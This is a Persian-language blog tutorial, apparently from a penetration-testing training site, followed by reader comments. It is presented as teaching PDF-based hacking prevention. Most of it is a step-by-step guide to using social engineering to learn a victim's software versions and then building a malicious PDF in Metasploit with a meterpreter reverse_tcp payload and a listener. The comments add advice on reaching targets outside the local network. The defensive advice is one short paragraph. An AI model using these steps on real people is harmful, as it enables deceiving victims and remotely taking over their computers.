تست امنیت و اموزش جلوگیری از هک با فایل pdf

هک با فایل pdf

در این قسمت از اموزش قصد داریم شما را با نحوه تست نفوذ سیستم به وسیله فایل pdf اشنا کنیم. با ما در ادامه این اموزش همراه باشید .

آموزش تست امنیت ویندوز و جلوگیری از هک با فایل pdf

یکی از سوالات پر تکرار کاربران این است که چگونه می توانیم تست نفوذ خود را با فرمت های مختلف انجام دهیم و به نتیجه برسیم ؟؟ اولین کاری که باید انجام دهید این است که درباره سیستم خود اطلاعات جمع اوری کنید و همانگونه که می دانید اولین و مهم ترین مرحله information gathering یا  جمع اوری اطلاعات است زیرا هرچقدر اطلاع بیشتری به دست اورید کار شما در هنگام تست نفوذ بسیار راحت تر خواهد بود و سریع تر پیش خواهد رفت , به این منظور باید اطلاعاتی از قبیل برنامه های موجود بر روی سیستم هدف خود را بدانید , اما چگونه ؟ متخصص امنیت می تواند با استفاده از مهندسی اجتماعی به راحتی متوجه شود که قربانی خود از چه ابزار هایی استفاده می کند .

برای درک بهتر این موضوع به مثال زیر توجه کنید :

متخصص امنیت با هر روشی با تارگت خود ارتباط برقرار می کند ( برقراری ارتباط می تواند به صورت مجازی و استفاده از شبکه های اجتماعی باشد یا به صورت حضوری یا تلفنی و … باشد. ) سپس در این مرحله خود را یک کاربر تازه وارد در دنیای کامپیوتر معرفی می کند و از قربانی خود سوالاتی طبیعی خواهد پرسید , برای مثال : سلام دوست عزیز من شنیده ام که شما در زمینه کامپیوتر مهارت خوبی دارید می توانید به من کمک کنید تا نرم افزار های مورد نیاز اولیه برای یک کامیپوتر را نصب کنم ؟؟

سپس متخصص امنیت می تواند از او سوال کند :

  • به نظر شما برای نمایش ویدیو در سیستم از چه مدیا پلیری استفاده کنم ؟
  • به نظر شما بهترین ورژن مجموعه نرم افزار office کدام است ؟
  • به نظر شما از کدام نسخه ادوب استفاده کنم ؟

درک مفهوم مهندسی اجتماعی

خب شاید از خود بپرسید که چنین سوالاتی بسیار ساده هستند و چنین اطلاعاتی به چه درد متخصص امنیت می خورد,
اما بیایید کمی به پشت پرده این سوالات دقت داشته باشیم .

زمانی که متخصص امنیت چنین سوالاتی را خواهد پرسید , تارگت بدون شک نسخه ای از نرم افزار را به متخصص امنیت پیشنهاد خواهد داد که خودش نیز در حال استفاده از ان نسخه است و به این ترتیب متخصص امنیت از ابزار های موجود و ورژن ابزار های موجود در سیستم مطلع خواهد شد وسپس می توانید با استفاده از جستجو در سایت های ثبت اکسپلویت به دنبال اسیب پذیری های مربوطه بگردد و در نهایت به نتیجه دلخواه خود برسد.

منطق تست امنیت با استفاده از فرمت های مختلف

تست امنیت و اموزش جلوگیری از  هک با فایل pdf
منطق تست نفوذ و هک با فرمت های مختلف فایل ها مانند pdf و psd

ایا تا به حال به این موضوع دقت کرده اید که متخصصان امنیت چگونه می توانند با استفاده از فرمت های مختلف به سیستم موردنظر تست نفوذ کنند ؟؟ تصور کنید متخصص امنیت قصد دارد با استفاده از پسوند psd که فایل خروجی نرم افزار فتوشاپ است در سیستم هدف تست کند , به این منظور یک فایل psd برای ارسال می کند و با کلیک کردن و اجرا کردن ان فایل توسط  از سیستم مربوطه در دسترس قرار می گیرد.

برای چنین کاری متخصص امنیت باید نرم افزار فتوشاپ را مورد بررسی قرار دهد و با استفاده از مهندسی معکوس این نرم افزار را تحلیل و بررسی کند و اسیب پذیری  هایی را در این نرم افزار پیدا کند و در  نهایت زمانی که اسیب پذیری مورد نظر را در نرم افزار فتوشاپ پیدا کرد، باید اکسپلویتی را برای نرم افزار فتوشاپ بنویسد که این اکسپلویت بتواند از اسیب پذیری موجود برای تست و تامین امنیت استفاده کند تا زمانی که تارگت بر روی فایل مخرب با پسوند psd کلیک کرد و ان را اجرا کرد بتواند از سیستم قربانی دسترسی بگیرد.

آشنایی کلی با اکسپلویت

دقت داشته باشید که هر اسیب پذیری نیاز به یک اکسپلویت دارد, تصور کنید قصد دارید از یک درب ورودی ,  عبور کنید به این منظور باید به دنبال اسیب پذیری داخل  درب باشید , سپس با بررسی این درب متوجه خواهید شد که  درب مورد نظر شما دارای یک اسیب پذیری است که اگر با یک چکش پنج مرتبه بر روی قفل ان ضربه بزنید قفل درب خواهد شکست و می توانید از درب مربوطه عبور کنید , در این قسمت اسیب پذیری مشخص شد

اکسپلویت دقیقا همان چکش است که می توانید با استفاده از به کارگیری ان از در به جهت تست و برقراری امنیت عبور کنید .

ابزار ها و سرویس های مختلف هم دقیقا به همین صورت کار می کنند به این منظور که متخصص امنیت در ابتدا اسیب پذیری را در یک سرویس پیدا خواهد کرد و در نهایت با نوشتن یک اکسپلویت از ان اسیب پذیری استفاده می کند.

در ادامه به صورت عملی با استفاده پیلود pdf به سیستم عامل ویندوز را تست خواهیم کرد .

نحوه تست امنیت به ویندوز و جلوگیری از هک با فایل pdf

تست امنیت و اموزش جلوگیری از  هک با فایل pdf
نحوه جلوگیری از هک با فایل pdf

در ابتدا سیستم عامل کالی لینوکس خود را بوت و راه اندازی کنید

سپس باید ابزار Metasploit را اجرا کنید , به این منظور می توانید ترمینال لینوکس خود را اجرا کنید

و دستور زیر را در این محیط وارد کنید تا این ابزار برای شما اجرا شود :

msfconsole

سپس زمانی که محیط متاسپلویت برای شما اجرا شد

باید با استفاده از دستور زیر اکسپلویت مورد نظر را فراخوانی کنید :

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

در این مرحله باید آپشن های مورد نظر خود را بر روی اکسپلویت تنظیم کنید

که برای مشاهده آپشن های موجود می توانید از دستور زیر استفاده نمایید :

show options

حال می توانید با استفاده از دستور زیر و تعیین نام , یک نام را برای فایل Pdf خود انتخاب کنید :

set FILENAME readme.pdf

در مرحله بعدی باید یک پیلود برای اکسپلویت خود انتخاب کنید که پیشنهاد ما استفاده از پیلود meterpreter است

, به این منظور از دستور زیر برای تنظیم یک پیلود استفاده کنید :

set PAYLOAD /windows/meterpreter/reverse_tcp

سپس باید با استفاده از دستور show options , اپشن های موجود را مشاهده کنید

و ان را به صورت مراحل پایین شخصی سازی نمایید.

انجام تنظیمات متاسپلویت برای تست نفوذ و هک با فایل pdf

با استفاده از دستور زیر ای پی خود را بر روی پیلود تنظیم کنید :

set LHOST 127.0.0.1

نکته : برای مشاهده ای پی خود می توانید از دستور ifconfig استفاده کنید.

سپس باید با استفاده از دستور زیر یک پورت دلخواه از پورت های شبکه را به پیلود معرفی کنید :

set LPORT 4567

در این مرحله باید فایل مخرب pdf خود را ایجاد کنید :

exploit

سپس یک ترمینال جدید باز کنید و دستور زیر را در ترمینال وارد نمایید :

cd /root/Desktop/ && mv /root/.msf4/local/readme.pdf readme.pdf

دستور بالا یک دستور ترکیبی است که ابتدا شما را به مسیر دسکتاپ وارد می کند و سپس فایل مخرب شما که در مسیر /root/.msf4/local/ قرار دارد را به صفحه دسکتاپ شما انتقال خواهد داد. در این مرحله به محیط متاسپلویت بازگردید و با استفاده از اکسپلویت مولتی هندلر یک listener برای خود با فایل pdf ایجاد کنید. سپس می توانید با استفاده از روش های مهندسی اجتماعی تارگت خود را قانع کنید تا بر روی فایل مخرب شما کلیک کند و اگر از ابزار اسیب پذیر و ورژن اسیب پذیر استفاده کند , شما می توانید دسترسی بگیرید.

امنیت در مقابل این نوع حملات

تست امنیت و اموزش جلوگیری از  هک با فایل pdf
جلوگیری از هک شدن با فایل pdf

بهترین روش برای برقراری امنیت سیستم خود در برابر این نوع حملات , هوشیاری شما است و باید دقت داشته باشید که فایل های مورد نظر خود را از منابع معتبر دانلود کنید و مورد استفاده قرار دهید و از افراد ناشناس و مشکوک فایلی را دریافت نکنید و حتی اگر شرایطی وجود داشت که مجبور به اجرای فایل مشکوک بودید , فایل را در یک محیط مجازی اجرا و تست کنید تا حتی اگر فایل مورد نظر شما یک فایل مخرب است , نفوذگر فقط و فقط دسترسی به محیط مجازی شما را داشته باشد و محیط اصلی سیستم عامل شما در امنیت کامل باشد، که می توانید با استفاده از مجازی سازی هایی مانند vm ware سیستم عامل های مجازی مانند ویندوز 10 و غیره را برای خود نصب و اجرا کنید.

نتیجه گیری

در این قسمت از اموزش شما را با نحوه کار کرد اکسپلویت ها اشنا کردیم و یاد گرفتید که متخصص امنیت چگونه می تواند با استفاده از فایل pdf و دیگر فرمت های موجود از سیستم دسترسی بگیرد و اسیب هایی خطرناک را به قربانی خود وارد کند و شما باید همیشه هوشیار باشید و از جدیدترین متد ها اگاه باشید تا بتوانید امنیت خود را در برابر چنین حملات حفظ کنید.

دقت داشته باشید که امنیت هیچ گاه صد درصد نیست .

4.3/5 (4 نظر)

مطالب مرتبط

۱۷ دیدگاه در “تست امنیت و اموزش جلوگیری از هک با فایل pdf”

  • dark دی 27, 1398 پاسخ

    سلام خسته نباشید اگه بخوایم روی سرور مجازی انجام بدیم به چه شکلی است

    • نیما حسینی دی 29, 1398 پاسخ

      درود
      داخل سرور مجازی کالی لینوکس هم به همین صورت باید کار را انجام دهید و فقط کافیست در بخش set LHOST ای پی سرور مجازی را وارد کنید و دیگر نیازی به روش های پورت فورواردینگ و … ندارید.

  • fardad اسفند 28, 1398 پاسخ

    ببخشید یه سوال داشتم:
    من اکسپلویت رو ایجاد می کنم ولی session نمی سازد میشه لطفا بهم کمک کنید

    • نیما حسینی فروردین 2, 1399 پاسخ

      درود
      احتمالا در سیستمی که تست انجام داده اید این اسیب پذیری وجود ندارد.

  • nAhmad خرداد 8, 1399 پاسخ

    درود مهندس خسته نباشید لطفاً نفوذ از طریق فایل pdf به اندروید رو هم اضافه کنید با تشکر از سایت بسیار عالی تون خدا خیرتون بده امیدوارم که در فراز و نشیب های زندگیتون همیشه موفق باشید🌹

    • نیما حسینی خرداد 17, 1399 پاسخ

      درود بر شما ممنون
      حتما بزودی این اموزش را هم در اموزش های بعدی قرار خواهیم داد.
      پایدار باشید.

  • محمد مهدی عبداللهی خرداد 25, 1399 پاسخ

    سلام خسته نباشید
    یک سوال دارم من تمام این مراحل رو به درستی انجام میدم و فایل مخرب را به درستی میسازم و فایل رو نصب هم میکنم اما نمی توانم شنود کنم . من این فایل رو با فلش انتقال میدم میخواستم بدونم مشکل از انتقال با فلش هست.

    • نیما حسینی تیر 1, 1399 پاسخ

      درود و تشکر
      اگر از شبکه داخلی استفاده می کنید ای پی شبکه داخلی خود را بزنید و اگر تارگت شما خارج از شبکه است از سرور مجازی استفاده کنید و ای پی پابلیک ان را وارد نمایید یا می توانید از اموزش پورت فورواردینگ استفاده کنید.

  • امیر آبان 23, 1399 پاسخ

    ببخشید ، میشه فایل پی دی اف این اموزش رو تو سایت بزارید یا به ایمیلم ارسال کنید؟

    • نیما حسینی آبان 25, 1399 پاسخ

      درود
      در صورت امکان این ویژگی را در اینده داخل سایت اضافه خواهیم کرد.

  • امیر21 آبان 23, 1399 پاسخ

    و یه سوال دیگه ، فایل مخرب رو باید خودمون بنویسیم یا خود اون برنامه این فایل مخرب رو داره؟

    • نیما حسینی آبان 25, 1399 پاسخ

      درود
      طبق اموزش ان را با متاسپلویت ایجاد می کنید.

  • kasra.fury آذر 30, 1399 پاسخ

    واقعا خیلی خوب میشه اگه اموزشش برای اندروید رو هم بزارید من هرچقدر با انواع اقسام روش ها سعی میکنم اندروید رو نمیتونم چون همه جا با اپ گذاشتن و گوشی هایه جدید اجازه ی نصب نمیده برای برنامه

    • پن‌تست‌کور دی 5, 1399 پاسخ

      درود
      در صورت امکان اموزشی در این رابطه قرار خواهیم داد.
      پیشنهاد می کنیم برای حل مشکلتون اموزش دور زدن سپر امنیتی گوگل را مشاهده کنید.

  • Sadegh دی 25, 1399 پاسخ

    عالی

  • سامان خرداد 27, 1402 پاسخ

    سلام
    متاسفانه امروز دو فایل pdf برای من ارسال شد و من بی توجهی کردم و فایل هارو باز کردم
    بعد از بررسی متوجه شدم که منبع ارسال کننده خیلی مطمئن نیست و الان احساس میکنم که احتمالا فایل آلوده بوده
    چطور میتونم بفهمم که سیستمم هک شده یا نه

    • پن‌تست‌کور مرداد 12, 1402 پاسخ

      درود
      می توانید از طریق بررسی اتصالات شبکه خود اقدام کنید و از روش های بسیاری دیگر که در سایت اموزش ان ها موجود است استفاده کنید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

قوانین پن تست کور
دوره کالی لینوکس
نماد های اعتماد
نماد های اعتماد